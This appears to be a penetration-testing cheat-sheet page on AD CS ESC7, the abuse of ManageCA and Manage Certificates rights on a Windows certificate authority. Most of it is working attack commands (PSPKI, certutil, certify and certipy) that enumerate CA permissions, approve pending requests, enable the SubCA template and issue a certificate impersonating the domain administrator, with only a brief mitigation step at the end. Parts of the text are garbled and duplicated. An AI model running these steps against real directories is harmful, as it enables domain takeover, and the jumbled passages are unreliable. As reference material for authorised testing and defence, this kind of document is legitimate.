ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
Check if EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
Enumerate using PSPKI
module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
ManageCA
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag to permit SAN specification in any template, a critical aspect of domain escalation.
Windows
ManageCAAttack rights to perform the ESC6 attack1
ESC6 attack got patch on May of 2022.
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
- Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
- Import
PSPKI
module
PSPKI
moduleImport-Module PSPKI
- Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
- Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Attack 2
OnlyFor this attack we only need ManageCA
permission
We will need Manage Certificates
permission (canand beSubCA
granted from ManageCA)
Certificate template SubCA must be enabled (but they both can be enabled from ManageCA)ManageCA
- Grant
Manage Certificates
access (Optional, if we don't already)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
- Enable
SubCA
Certificate template (Optional, if we don't already)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
- Request certificate based on the
SubCA
template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
- Issue the failed certificate
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
- Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
ManageCA
, Manage Certificates
and SubCA
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")